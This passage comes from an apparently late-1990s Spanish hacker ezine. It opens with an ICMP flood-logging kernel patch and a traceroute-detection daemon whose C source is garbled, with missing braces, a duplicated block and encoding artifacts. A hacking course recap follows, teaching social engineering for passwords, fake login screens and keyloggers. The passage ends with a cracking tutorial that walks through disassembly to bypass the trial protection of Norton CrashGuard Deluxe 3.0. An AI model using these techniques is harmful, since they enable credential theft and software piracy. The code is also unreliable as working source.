  629.   printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n", 
  630.   in_ntoa(saddr),icmp_param.data_len); 
  631.   } 
  632.   else 
  633.   printk(KERN_INFO "ICMP: possible FLOOD DETECTED by %s, packetsize = %d \n", 
  634.   in_ntoa(saddr),len ); 
  635.   #endif 
  636.   kfree_skb(skb, FREE_READ); 
  637.   } 
  638.  
  639. ------------ Codigo Fuente ---------------------------------------------------
  640.  
  641. detecttr.c 
  642. /* 
  643. * detecttr.c - by whynot AKA baldor (whynot@cyberjunkie.com) 
  644. * creado el: 08.05.97 
  645. * ultima modificacion: 11.07.97 
  646. * Plataformas: Linux, FreeBSD, podria funcionar con otros sistemas POSIX 
  647. * tambien. 
  648. * Compilacion: 
  649. * usa "gcc -o detecttr detecttr.c" para GNU C y 
  650. * "cc -o detecttr detecttr.c" para otros compiladores... 
  651. * Uso: 
  652. * Ejecuta este programa al arrancar la maquina permanecer en background 
  653. * hasta que alguien te haga un traceroute. Solo hace un *miserable* uso de 
  654. * tu RAM y cerca de un 0% de uso de tu CPU :) 
  655. */ 
  656.  
  657. #include <stdio.h> 
  658. #include <stdlib.h> 
  659. #include <errno.h> 
  660. #include <string.h> 
  661. #include <sys/types.h> 
  662. #include <netinet/in.h> 
  663. #include <sys/socket.h> 
  664. #include <sys/wait.h> 
  665. #include <sys/time.h> 
  666. #include <sys/signal.h> 
  667. #include <sys/syslog.h> /* comenta esta linea si no tienes syslog.h */ 
  668. #include <netdb.h> 
  669.  
  670.  
  671. #define MAXBUFLEN 200 
  672. #define MYPORT 33435 
  673. #define NUMPORTS 30*3 
  674.  
  675. int sockfd[NUMPORTS]; 
  676.  
  677.  
  678. void shutitdown() 
  679.  
  680. int w; 
  681. char buf[50]; 
  682. for (w=0; w<NUMPORTS; w++) 
  683. close(sockfd); 
  684. sprintf (buf,"DetectTraceroute terminado\n"); 
  685. syslog(LOG_NOTICE , buf); 
  686.  
  687. exit(0); 
  688.  
  689. char *getname (struct in_addr addr) 
  690. struct hostent *h; 
  691. int w; 
  692. char foo[4]; /* los 4 numeros se usan como valores ASCII en un char */ 
  693. int tmpint[4]; /* se usa para convertir un string en 4 numeros */ 
  694. char tmpbuf[20]; 
  695.  
  696. sprintf(tmpbuf, "%s", inet_ntoa(addr)); 
  697.  
  698. if ( sscanf(tmpbuf,"%d.%d.%d.%d", &tmpint[0], &tmpint[1], &tmpint[2], 
  699. &tmpint[3]) != 4) { 
  700. printf ("Error detectando nombre de host !\n"); 
  701. exit(1); 
  702.  
  703. for(w=0; w<4; w++) foo[w]=tmpint[w]; 
  704.  
  705. if ( (h=gethostbyaddr(foo, 4, AF_INET)) == NULL) { 
  706. herror("gethostbyaddr"); 
  707. exit(1); 
  708. return h->h_name; 
  709.  
  710. main(int argc, char *argv[]) 
  711. int hops; 
  712. struct sockaddr_in my_addr; 
  713. struct sockaddr_in remote_addr; 
  714. int addr_len, numbytes; 
  715. char buf[MAXBUFLEN]; 
  716. int w; 
  717. fd_set readfds; 
  718.  
  719.  
  720. if( fork() !=0 ) return(0); /* Si no queremos usar el &... */ 
  721.  
  722.  
  723. signal(SIGHUP, SIG_IGN); /* ignorar SIGHUP */ 
  724.  
  725. signal(SIGTERM, shutitdown); /* shutdown limpio */ 
  726.  
  727. for(w=0; w<NUMPORTS; w++) { 
  728.  
  729. if ( (sockfd[w] = socket( AF_INET, SOCK_DGRAM, 0)) == -1) { 
  730. perror("socket"); 
  731. exit(1); 
  732. my_addr.sin_family = AF_INET; 
  733. my_addr.sin_port = htons (MYPORT+w); 
  734. my_addr.sin_addr.s_addr = htonl(INADDR_ANY); 
  735.  
  736. bzero(& (my_addr.sin_zero), 8); 
  737.  
  738. if ( bind (sockfd[w], (struct sockaddr *)&my_addr, sizeof (struct sockaddr) ) 
  739. == -1) { 
  740. perror("bind"); 
  741. exit(1); 
  742.  
  743. FD_ZERO(&readfds); 
  744. for(w=0; w<NUMPORTS; w++) 
  745. FD_SET(sockfd[w], &readfds); 
  746.  
  747.  
  748. sprintf (buf,"DetectTraceroute iniciado con exito\n"); 
  749. syslog(LOG_NOTICE , buf); 
  750.  
  751. while(1) { 
  752. select(sockfd[NUMPORTS-1]+1, &readfds, NULL, NULL, NULL); 
  753.  
  754. for (w=0; w < NUMPORTS; w++) { 
  755. if (FD_ISSET(sockfd[w], &readfds)) 
  756. hops = w; 
  757.  
  758. addr_len = sizeof(struct sockaddr); 
  759.  
  760. if ((numbytes=recvfrom(sockfd[hops], buf, MAXBUFLEN, 0, (struct sockaddr 
  761. *)&remote_addr, &addr_len)) == -1) { 
  762. perror("recvfrom"); 
  763. exit(1); 
  764.  
  765. /* we use buf for misc stuff O:-) */ 
  766. sprintf (buf,"TRACEROUTE desde IP %s. Host: %s HOPS: %d", 
  767. inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1); 
  768. syslog(LOG_NOTICE , buf); 
  769. FD_ZERO(&readfds); 
  770. for(w=0; w<NUMPORTS; w++) 
  771. FD_SET(sockfd[w], &readfds); 
  772.  
  773. /* we use buf for misc stuff O:-) */ 
  774. sprintf (buf,"TRACEROUTE desde IP %s. Host: %s HOPS: %d", 
  775. inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1); 
  776. syslog(LOG_NOTICE , buf); 
  777. FD_ZERO(&readfds); 
  778. for(w=3D0; w<NUMPORTS; w++) 
  779. FD_SET(sockfd[w], &readfds); 
  780.  
  781. ------------ FIN -------------------------------------------------------------
  782.  
  783.   Traducido por CubikIce -- cubikice@iname.com 
  784.  
  785. <────────────────────────────────────────────────────────────────────────────>
  786. ██████████████████████████████████████████████████████████████████████████████
  787. <────────────────────────────────────────────────────────────────────────────>
  788.  
  789.                               - CURSO DE HACK - 
  790.                                   CHAPTER V
  791.  
  792.         Bueno, como ya se dijo en la Editorial este es el fin del primer
  793.   volumen, por lo que creo que sera aconsejable en este numero, dar un
  794.   repaso de las lecciones aprendidas. Ahora ya deberiamos tener una nocion
  795.   basica de Hacking, pasando por la ingenieria social hasta un analisis de
  796.   un server, pero para los que no les quedo claro, con lo expuesto aqui ya
  797.   saldran de dudas y para aquellos que ya lo hayan aprendido pues un
  798.   repaso no les vendra nada mal.
  799.  
  800.         Como vimos en el primer numero fue la ingenieria social, esto no
  801.   creo que sea muy dificil de entender, basicamente consiste en hacernos
  802.   pasar por otra persona con el fin de sacarle su login y password o algun
  803.   tipo de informacion confidencial. Con el tiempo se ira cogiendo practica
  804.   con esta tecnica y ademas seguir los pasos explicados en el numero 1º del
  805.   ezine, ya que tenemos que tener mucho cuidado de lo que decimos y de quien
  806.   nos hacemos pasar, ya que nos podriamos delatar.
  807.  
  808.         El capitulo II esta enfocado a tecnicas hacker utilizando el
  809.   ordendaor como herramienta, me estoy refiriendo logicamente a: Shoulder
  810.   Surfing, Trashing, Pantallas Falsas y Key Recorder. Ahora explicaremos cada
  811.   una de las diferentes tecnicas. Shoulder Surfing es sencillamente mirrar por
  812.   encima del hombro cuando una persona esta metiendo su login y password para
  813.   entrar en su cuenta. Trashing cuando 'cotilleamos' la basura de un ISP,
  814.   Telefonica, etc... con el fin de obtener alguna informacion util para
  815.   hackear. Las Pantallas Falsas son cuando escribimos un pequeño programa que
  816.   simula la conexion a un servidor y cuando la victima introduce su login y
  817.   password, estos quedan grabados para nuestro posterior uso. Los Key
  818.   Recorder son parecidos a las Pantallas Falsas, ya que eston son unos
  819.   pequeños programas que se dejan residentes en memoria para que vaya grabando
  820.   las teclas que los usuarios pulsen. Logicamente aqui solo he definido de
  821.   manera sencilla el uso de las diferentes tecnicas, para profundizar en la
  822.   materia conviene leerse otra vez el numero II del ezine.
  823.  
  824.         El capitulo III se dedico a una interesante y util herramienta de un
  825.   hacker, me estoy refiriendo al scaneo de puertos, ya que esto nos sera de
  826.   gran ayuda para buscar bug's en los servidores y poder colarnos o taparlos
  827.   :). Es conveniente tener a mano un listado de los puertos, como el que se
  828.   incluyo en el ezine III y tb disponer de varios tipos de scaners como por
  829.   ejemplo para scanear puertos, sub-dominios, etc... Al igual que antes para
  830.   coger mas soltura leerse el capitulo III.
  831.  
  832.   - Aqui Os Pongo Un Listado De Diferentes Scaners Que Os Pueden Ser Utiles.
  833.  
  834.   #ident-scan.c
  835.  
  836.   #ftp-scan.c
  837.  
  838.   #jakal.c
  839.  
  840.   #strobe103_tar.gz
  841.  
  842.   #scan.sh
  843.  
  844.   #statd-scan.c
  845.  
  846.   #udpscan.c
  847.  
  848.  
  849.         El capitulo IV junto con el III consiste en analisis de servidores,
  850.   en esta entrega vimos como utilizar diferentes comandos del s.o. Unix/Linux
  851.   para obtener informacion de un servidor remoto. Siendo muy util tanto para
  852.   un hacker como para un Administrador. Tengo que confesar que no explique
  853.   todos los comandos que nos pueden ser utiles para un analisis pero si lo
  854.   explico todo, entonces no tiene gracia y como es bien sabido 'Un hacker se
  855.   hace a si mismo a base de estudio y paciencia'. Tambien deciros que para
  856.   aplicar estos metodos de analisis conviene saber Unix/Linux ya que sino,
  857.   si solo plagiamos los comandos explicados, no sabemos que hacen exactamente
  858.   y no queremos aprender nada mas, entonces no llegaremos muy lejos y ni
  859.   siquiera seremos un intento de hacker.
  860.  
  861.         Ahora ya creo que las dudas que hubiese podido haver han desaparecido,
  862.   pero lo conveniente seria volverse a leer los capitulos que no hayan quedado
  863.   claros y por supuesto experimentar con lo aprendido. Desde estas lineas
  864.   quiero hacer un llamamiento a aquellos lectores que sigan el curso y
  865.   consigan resultados positivos para que nos envien un mail poniendo en el
  866.   subject :'Curso Hack JJF' y asi lo pondre aqui para que todos lo vean,
  867.   incluso si has creado algo nuevo, pues mucho mejor :) Para los paranoicos
  868.   tenemos a disposicion la llave publica PGP de - J.J.F. / HACKERS TEAM -.
  869.  
  870.         Pues viene el tipico rollo pero que nos puede ser muy util, es el
  871.   bocabulario tecnico que hemos estado usando en el curso.
  872.  
  873.   - Un Poco De Bocabulario Tecnico.
  874.  
  875.   #C: Lenguaje de programacion general.
  876.  
  877.   #Hacker: Persona que disfruta explorardo nuevos usos en la tecnologia por
  878.            puro placer, jamas con fines delictivos.
  879.  
  880.   #Hacking: Accion realizada por un hacker.
  881.  
  882.   #Ingenieria Social: Tecnica por el cual un hacker engaña a una persona para
  883.                       sacarle informacion privilegiada.
  884.  
  885.   #Key Recorder: Programa el cual graba las teclas que van siendo pulsadas.
  886.  
  887.   #Linux: Sistema Operativo semejante al Unix el cual es gratis.
  888.  
  889.   #Pantallas Falsas: Tecnica o Programa el cual simula la conexion a un
  890.                      servidor para interceptar login y password.
  891.  
  892.   #PGP: Pretty Good Privacy. Programa de criptografia el cual no puede ser
  893.         desencriptado actualmente.
  894.  
  895.   #Puerto: Medio por el cual un servicio de un servidor se comunica con el
  896.            cliente.
  897.  
  898.   #Shoulder Surfing: Tecnica que consiste en mirrar por el encima del hombro.
  899.  
  900.   #S.O.: Sistema Operativo. 
  901.  
  902.   #Trashing: Tecnica en la cual se cotillea la basura fisicamente para obtener
  903.              informacion util.
  904.  
  905.   #Unix: Sistema Operativo, que cual es multitarea y multiusuario.
  906.  
  907.         Bueno chicos, esto es todo por hoy y ya en el proximo capitulo
  908.   haremos algo mas interesante, pero como debeis comprender estos capitulos de
  909.   repaso son necesarios.
  910.  
  911.   Byes all y hasta la vista !!
  912.     
  913.                                                         CONDE VAMPIRO
  914.                                                   - J.J.F. / HACKERS TEAM -
  915.  
  916. <────────────────────────────────────────────────────────────────────────────>
  917. ██████████████████████████████████████████████████████████████████████████████
  918. <────────────────────────────────────────────────────────────────────────────>
  919.  
  920.                  -->>->  CORTA HISTORIA DEL TIEMPO  <-<<--
  921.  
  922.   Norton CrashGuard Deluxe 3.0
  923.  
  924.   TIPOS DE PROTECCIONES TEMPORALES
  925.   UN POCO DE TEORIA
  926.   EN BUSCA DE LA FRASE MAGICA
  927.   EL REGISTRO DEL SISTEMA
  928.  
  929.   COMO CRACKEAR Norton CrashGuard Deluxe 3.0
  930.  
  931.   PRIMERA EXPLORACION
  932.   PRIMERA SORPRESA
  933.   SEGUNDA SORPRESA
  934.  
  935.   LA APROXIMACION DIFICIL
  936.  
  937.   AL ATAQUEEEEEEEEEEEEEE
  938.   LA FECHA DE CADUCIDAD
  939.   CHECKSUMS PARAINOCOS
  940.   CHECKSUMS HASTA EN LA SOPA
  941.   LA MISMA PROTECCION EN TODOS SITIOS
  942.  
  943.   LA APROXIMACION FACIL
  944.  
  945.   REUNIENDO LAS PIEZAS
  946.   LA COMPRA VIRTUAL
  947.   MODIFICANDO EL REGISTRO
  948.   MODIFICACI╙N DE LA VARIABLE DEL REGISTRO DEL SISTEMA
  949.  
  950.   MORALEJA
  951.  
  952.   Saludos Familia.
  953.  
  954.         Bastante tiempo desde mi ultimo articulo, los se, pero ya estamos de
  955.   vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un
  956.   poco de teoria y lo aprendido lo aplicaremos al programa Noton Uncrash
  957.   Deluxe desde dos puntos de vista, el temporal y el de la password pa
  958.   registrarse.
  959.  
  960.   TIPOS DE PROTECCIONES TEMPORALES
  961.  
  962.         Demos un peque repaso a los diferentes esquemas de proteccion
  963.   temporal que nos podemos encontrar (recomiendo la lectura del Capitulo
  964.   4.1 de +ORC )
  965.  
  966.         - CINDERELLA. El programa funciona durante una cierto periodo de dias
  967.   (digamos 15 dias) comenzando desde la fecha de instalacion.
  968.  
  969.         - BEST_BEFORE. El programa funciona durante una cierto periodo de
  970.   tiempo independientemente de la fecha de instalacion. El programa caduca
  971.   el 30/12/97.
  972.  
  973.         - COUNTDOWN. El programa funciona solo durante unos minutos o unos
  974.   segundos.
  975.  
  976.         - QUIVER. El programa funciona solo durante un numero determinado de
  977.   ejecuciones. Realmente no es una proteccion temporal, pero su esquema de
  978.   proteccion se parece mucho al de los otros tres tipos.
  979.  
  980.   UN POCO DE TEORIA
  981.  
  982.         Analizemos como funciona una proteccion temporal.
  983.  
  984.         Los "inteligentes programadores" ofertan sus productos completos al
  985.   publico con ridiculas protecciones. Le colocan una fecha de caducidad,
  986.   pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo
  987.   las grandes compañias como Micro$oft, Corel, o Symantec. La idea es
  988.   distribuir masivamenete sus productos aprovechando los estupendos canales
  989.   de distribucion que ofrecen las revistas de Soft. Una vez inundado el
  990.   mercado, el usuario disfrutara del producto, se acostumbrara a el, hasta
  991.   que le sea indispensable y tenga que comprarlo a un precio desorbitado.
  992.   Esta tactica no es nueva, sino preguntad a algun camello, o como la CIA
  993.   distribuyo la heroina entre el Black Power.
  994.  
  995.         Pensemos un poco. ¿Como conoce el programa que ya ha caducado el
  996.   periodo de evaluacion?. Supongamos que tenemos una evaluacion e 15 dias e
  997.   instalamos nuestro programa el 1 de febrero. Sumando la fecha de
  998.   instalacion (1 Febrero) mas el periodo de prueba se obtiene la fecha de
  999.   caducidad:15 febrero (El dia en el que lo instalas cuenta como dia habil).
  1000.   El programa, lo primero que calcula es si la fecha actual es menor o igual
  1001.   que la fecha de caducidad, y en tal caso, se ejecuta normalmente. Si es
  1002.   mayor, dara un bonito mensaje "El periodo de evaluacion ha expirado".
  1003.  
  1004.         Una cosa esta clara, el programa debe guardar alguna de las dos
  1005.   fechas siguientes (o las dos):
  1006.  
  1007.   A - Fecha de Instalacion y el periodo de evaluacion.
  1008.   B - Fecha de caducidad.
  1009.  
  1010.         Lo normal es la opcion B. Al instalarse el programa, se calcula la
  1011.   fecha de caducidad y se guarda en algun sitio. Normalmente se guarda en el
  1012.   registro del sistema bajo algun nombre estupido, aunque se puede guardar en
  1013.   el win.ini, system.ini, fichero oculto, o algun fichero que parezca
  1014.   inofensivo. Lo cierto es que debe guardarlo.
  1015.  
  1016.         Existe una variante, y es que la fecha de caducidad este dentro del
  1017.   ejecutable. Un ejemplo lo tenemos en la evaluacion del Hotmetal 4.0., del
  1018.   tipo BEST_BEFORE, que dentro de su ejecutable aparecia 31/12/97. Madre de
  1019.   Mitra, que estupidos pueden llegar a ser los zombi-programadores.
  1020.   Dependiendo de la pericia del programador la fecha de caducidad puede estar
  1021.   o no encriptada para ocultarla de la vista del usuario y para que sea
  1022.   dificil modificarla. Resumiendo, el programa debe guardar la fecha de
  1023.   caducidad y comprobarla al inicio del programa con la fecha actual.
  1024.  
  1025.         Ya sabemos de donde saca la fecha de cadudidad, pero, ¿de donde saca
  1026.   la fecha actual?. Normalmente (el 99% de las veces) se extrae con una
  1027.   llamada a la funcion getlocaltimeo o getsystemtime. Pero se puede extraer
  1028.   viendo la fecha de algun fichero que se modifique periodicamente como el
  1029.   system.dat o el bootlog.txt.
  1030.  
  1031.   Los puntos de ataque a este esquema son claros:
  1032.  
  1033.         - Atacar en el calculo de la fecha de caducidad.
  1034.   En vez de sumar 15 dias sumamos 15 siglos. Esta aproximacion es dificil por
  1035.   que el calculo se realiza una unica vez, generalmente en la instalacion.
  1036.  
  1037.         - Modificar la fecha de caducidad.
  1038.   Si la fecha esta encriptada, necesitariamos construir un algoritmo de
  1039.   encriptacion para la nueva fecha que deseemos introducir. Por lo que en
  1040.   general, puede ser complicado.
  1041.  
  1042.         - Forzar la caducidad del programa.
  1043.   Se analizan los mensajes que da el programa y a partir de ellos se le sigue
  1044.   la pista hacia atras. Es una tactica muy utilizada.
  1045.  
  1046.         - Atacar en la comprobacion de la fecha actual y la fecha de
  1047.           caducidad.
  1048.   Simplemente modifica la comprobacion para que siempre estemos en el periodo
  1049.   de evaluacion. Esta es una opcion elegante.
  1050.  
  1051.         Alguien podria pensar que si se echa pa tras el reloj de W95, la
  1052.   proteccion temporal se elimina. Para evitar esta "trampilla", los
  1053.   programadores colocan codigo como el siguiente:
  1054.  
  1055.         SI esta activada la marca de caducidad ENTONCES el programa ha
  1056.   caducado y se finaliza el programa DE LO CONTRARIO SI
  1057.   fechaActual>fechaCAducidad ENTONCES activar marca de caducidad
  1058.  
  1059.         Como veis si os pasais de la fecha de caducidad, se activa una marca
  1060.   que impedira que se ejecute el programa aunque modifiqueis el reloj. Esta
  1061.   marca se guarda en los mismos sitios donde se guarda la fecha de caducidad.
  1062.  
  1063.         A veces, la proteccion temporal queda eliminada introduciendo una
  1064.   palabra clave, por lo que a veces es mas rapido atacar por la password.
  1065.  
  1066.         Para averiguar el fichero que contiene la proteccion temporal, se
  1067.   puede usar el SoftIce y poner un bpx getlocaltime, o bien una nueva tecnica,
  1068.   muy util no solo para protecciones temporales. Veamosla.
  1069.  
  1070.   EN BUSCA DE LA FRASE MAGICA
  1071.  
  1072.         Todos los mensajes de un programa, los de error, los de felicitacion,
  1073.   los de aviso, no son mas que cadenas de caracteres que deben de residir en
  1074.   un fichero. Para protecciones temporales es util buscar mensajes como
  1075.   'expire', 'demo', 'evaluation'. Si localizamos estos mensajes habremos
  1076.   localizado, generalmente, el fichero que contiene la proteccion y podemos
  1077.   desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con
  1078.   buscar los mensajes 'unregistered', 'register' para localizar el programa
  1079.   con la proteccion en esquemas por palabra clave. Recomiendo una herramienta
  1080.   excelente para buscar cadenas, es el programa sr32.exe, Search & Replace
  1081.   for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajaoslo y
  1082.   crackearlo, tiene una bonita y sencillota proteccion del tipo CINDERELLA.
  1083.  
  1084.   EL REGISTRO DEL SISTEMA
  1085.  
  1086.         El Registro del Sistema no es mas que un fichero gigante (system.dat)
  1087.   donde W95 y el esto de los programas dejan sus miserias, osea, sus
  1088.   variables, sus parametros de configuracion, su fecha de caducidad, sus
  1089.   marcas de caducidad. Muchos cracks solo necesitan modificar adecuadamente
  1090.   el system.dat  Es muy conveniente que le echeis un vistazo, aprendereis
  1091.   mucho y podreis modificar muchos de los parametros del Windoze.
  1092.  
  1093.         Para editar el registro, se utiliza normalmente el programa
  1094.   regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo
  1095.   que lo ejecuteis con el parametro /v ,osease, c:\windows\regedit /v
  1096.  
  1097.   COMO CRACKEAR Norton CrashGuard Deluxe 3.0
  1098.  
  1099.   Objetivo: Norton Uncrash Deluxe.
  1100.   Version: 3.0
  1101.   Nombre del ejecutable: ncgd3w95.exe
  1102.   Website: http://www.symantec.com 
  1103.   Tamaño del ejecutable: 11.964.671 bytes.
  1104.   Tipo de proteccion: Cindirella
  1105.   Dificultad: Medio. 
  1106.   Tiempo de crackeo: 2 horas. 
  1107.   Herramientas: W32dasm8.X, SoftIce.
  1108.  
  1109.         En esta ocasion, nuestro objetivo es una gran y abominable compañia,
  1110.   la Symantec y uno de sus muchos y abominables producto: Norton CrashGuard
  1111.   Deluxe 3.0 Basicamente, el programa consigue, en algunas ocasiones, que las
  1112.   aplicaciones que se cuelgan no bloqueen al Windoze. Cosa de agradecer dado
  1113.   el alto indice de siniestralidad de las aplicaciones y del propio Windoze.
  1114.   Ademas de tener una B.D de informacion sobre el PC, una antivirus ... Se
  1115.   protege con proteccion temporal CINDERELLA de 30 dias.
  1116.  
  1117.   PRIMERA EXPLORACION
  1118.  
  1119.         Instalamos el programa y antes de finalizar la instalacion ya nos
  1120.   pide que nos registremos, mal asunto, quieren cobrar antes de que probemos
  1121.   su producto, su codicia de palpa ante incluso de ver el programa.
  1122.  
  1123.         Una vez  instalado, nos ha metido a escondidas varias cosas:
  1124.  
  1125.         - Una Dll con un extraño nombre: 30vfv6vn.sys situada en el raiz de
  1126.  la unidad c: El nombre varia en cada instalacion, solo permanece fijo
  1127.  *fv6vn.sys, los 3 primeros caracteres son variables. Sospecho que solo es un
  1128.  indicador para ver si el programa ya ha sido instalado.
  1129.  
  1130.         - Una aplicacion en el arranque del Windoze Norton CrashGuard Deluxe
  1131.   Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicacion por dos veces
  1132.   con el nombre de checkup Su mision es detectar cualquier cambio en el reloj
  1133.   del sistema para bloquear inmediatamente la aplicacion si nos pasamos de la
  1134.   fecha de caducidad.
  1135.  
  1136.         Ademas se crean dos directorios Norton CrashGuard y Norton CrashGuard
  1137.   Deluxe y nos aparece un bonito icono en el escritorio del Windoze con forma
  1138.   de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si
  1139.   fuera poco, dos iconos en la barra de tareas, la aplicacion propiamemte
  1140.   dicha (escudo gris con una N en azul) y una historia de los cuelges de los
  1141.   programas (un reondel con una marca de verificacion).
  1142.  
  1143.         Si pulsamos en el icono del escritorio nos aparece una ventana donde
  1144.   nos dice que nos compremos INMEDIATAMENTE la aplicacion a un precio
  1145.   fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el
  1146.   numero de dias que restan para el programa deje de funcionar. Ademas
  1147.   aparecen unos bonitos botones en los que nos podemos registrar por Internet,
  1148.   probar el producto o cancelar. Si probamos el producto, aparece la ventana
  1149.   principal con todas pas opciones. Si elegimos la opcion de registro,
  1150.   aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta de
  1151.   credito.
  1152.  
  1153.   PRIMERA SORPRESA 
  1154.  
  1155.         El sistema de pago no es de la propia Symantec, sino de la empresa
  1156.   Release Software Corporation:http://www.releasesoft.com) y su programa
  1157.   SalesAgen. Es la primera vez y veo que Symantec no controle todos los
  1158.   aspectos de una aplicacion.
  1159.  
  1160.   SEGUNDA SORPRESA
  1161.  
  1162.         El fichero a estudiar es el Norton CrashGuard\cgmain.exe (229.376
  1163.   bytes) por una simple razon, tiene el unico fichero que tiene el icono que
  1164.   el del programa principal que aparece en la barra de tareas. Pero, en el
  1165.   mismo directorio aparece un extraño fichero llamado cgmain.dl_ (743.936
  1166.   bytes). Mu raro, una libreria aparentemente comprimida (y por tanto no
  1167.   utilizada) con un tamaño mas grande que el ejecutable. Por que no esta
  1168.   descomprimida la libreria, ¿quizas por que no estamos registrados? :-)
  1169.  
  1170.         Ademas aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu
  1171.   parecido al fichero del programa que estamos analizando cgmain.exe y tiene
  1172.   un icono que tiene las letras RS, que curioso, justo las Iniciales del la
  1173.   empresa que dedica a comercializar el producto: Release Software. Si
  1174.   intentamos ejecutar cgmaipop.exe aparece que esta preparando el Software.
  1175.   PREPARANDO?, ¿es que hay que precalentar los programas antes de
  1176.   instalarlos?. Luego aparece un mensaje de error indicando que no podemos
  1177.   ejecutar la aplicacion,  ¿quizas por que no estamos registrados? :-)
  1178.  
  1179.         Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un
  1180.   nombre muy parecido al de la aplicacion que queremos estudiar y
  1181.   aproximadamente con el mismo tamaño. Y el colmo, en el otro directorio,
  1182.   donde reside el menu de la aplicacion Norton CrashGuard Deluxe\CGDeluxe.exe
  1183.   aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll.
  1184.   Analogamente para Norton CrashGuard Deluxe\checkup.exe (el programa de
  1185.   testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll
  1186.  
  1187.         Todo esto huele a chamusquina, seguro que estos ficheros tienen algo
  1188.   que ver a la hora de registrar el programa, y como veremos en la segunda
  1189.   pate del articulo, tienen que ver y MUCHO.
  1190.  
  1191.   LA APROXIMACION DIFICIL
  1192.  
  1193.   AL ATAQUEEEEEEEEEEEEEE
  1194.  
  1195.         Podriamos analizar esos extraños ficheros que han aparecido, y lo
  1196.   haremos en la segunda parte del articulo. Ahora atacaremos formalmente a
  1197.   Norton CrashGuard\cgmain.exe para analizar su esquema CINDERELLA de 30 dias.
  1198.  
  1199.         Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de
  1200.   fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5)
  1201.   Name: GetLocalTime. Bien, bien, asi que, aparentemente, esta usando la
  1202.   tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza,
  1203.   estaremos en plena rutina de comprobacion de fecha: fechaActual>fecha de
  1204.   caducidad?
  1205.  
  1206.         Solamente aparece la funcion getlocaltime que es utilizada una vez en
  1207.   el programa(¿por que lo ponen tan facil?)
  1208.  
  1209.   * Referenced by a CALL at Addresses:
  1210.   |:0040D5B4   , :0040DA44   , :0040DD3F;   La rutina es llamada 3 veces
  1211.  
  1212.   :0041E200 81ECCC000000            sub esp, 000000CC
  1213.   :0041E206 8D442410                lea eax, dword ptr [esp+10]
  1214.   :0041E20A 50                      push eax
  1215.  
  1216.   * Reference To: KERNEL32.GetLocalTime, Ord:00F5h
  1217.   |
  1218.   :0041E20B FF15BC544400            Call dword ptr [004454BC]
  1219.   :0041E211 8D4C2400                lea ecx, dword ptr [esp]
  1220.   :0041E215 51                      push ecx
  1221.  
  1222.   * Reference To: KERNEL32.GetSystemTime, Ord:0135h
  1223.   |
  1224.   :0041E216 FF15B8544400            Call dword ptr [004454B8]
  1225.   .....
  1226.  
  1227.         Ademas aparece la llamada tambien a  GetSystemTime.
  1228.  
  1229.         Tras la llamada a GetSystemTime los valores de año, mes, dia,.... son
  1230.   extraidos de la pila y guardados en los registros :0041E21 mov dx, word ptr
  1231.   [esp+0A] De los registros pasan a unas variables globales :0041E2AA mov
  1232.   dword ptr [0042F7F0], edx
  1233.  
  1234.         Recordad, cualquier posicion de memoria fija como [0042F7F0], es
  1235.   utilizada como variable global por el programa. Despues se reintroducen en
  1236.   la pila el año, el mes, el dia,.... y se llama a la rutina :0041E310 call
  1237.   00423420.
  1238.  
  1239.         En esta rutina es donde se realiza la encriptacion de la fecha,al
  1240.   finalizar, devuelve en eax la fecha encriptada y ademas de guardarse en
  1241.   :0041E323 mov dword ptr [ecx], eax
  1242.  
  1243.         Es mas, las tres llamadas a :0041E200 obtendran en eax la fecha
  1244.   encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo
  1245.   como es la rutina de encriptacion. Simplemente decir que utiliza la
  1246.   siguiente formula :
  1247.  
  1248.   t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+
  1249.   (secondsDay*daysMonth[month])+(secondsYear*(year-1900))+(secondsDay*((
  1250.   (year-1900)-1)/4));
  1251.   fin=(t+fixValue);
  1252.  
  1253.         Siempre es mas facil comparar un numero que comparar años, dias,
  1254.   meses,... por eso la fecha se transforma en un numero. He construido un
  1255.   pequeño programa NORTON.EXE en C que realiza todo el proceso de
  1256.   encriptacion de la fecha.
  1257.  
  1258.         Bien, lo logico, es que una vez encriptada la fecha se compruebe con
  1259.   la fecha de caducidad que debe estar encriptada. Si analizamos las tres
  1260.   llamadas a :0041E200 tenemos:
  1261.  
  1262.   * La llamada desde :0040D5B4, se limita a guardar la fecha encriptada
  1263.   :0040D641 mov dword ptr [esi+000002AC], eax
  1264.  
  1265.   * La llamada desde :0040DA44, :0040DD3F  hacen practicamente lo mismo,
  1266.   mueven la fecha encriptada que estaba en eax a un registro, hacen una
  1267.   llamada a call 40DC40 y despues comprueban la fecha encriptada con
  1268.   [edi+00000284]
  1269.  
  1270.   En concreto para la llamada desde :0040DD3F
  1271.   :0040DD4B mov ebx, eax
  1272.  
  1273.   :0040DD62 push ebx
  1274.   :0040DD63 call 0040DC40
  1275.  
  1276.   :0040DD7B cmp dword ptr [edi+00000284], ebx
  1277.   :0040DDBF ja 0040DDE4
  1278.  
  1279.   En concreto para la llamada desde :0040DA44
  1280.  
  1281.   :0040DA54 mov edi, eax
  1282.  
  1283.   :0040DA5F push edi
  1284.   :0040DA60 call 0040DC40
  1285.  
  1286.   :0040DAB2 cmp dword ptr [ebx+00000284], edi
  1287.   :0040DAB8 ja 0040DACE
  1288.  
  1289.         Esto suena a una doble comprobacion temporal, seran desconfiados
  1290.   estos chicos.
  1291.  
  1292.         ¿Pero que hace la llamada a call 0040DC40?, para ello cerramos el
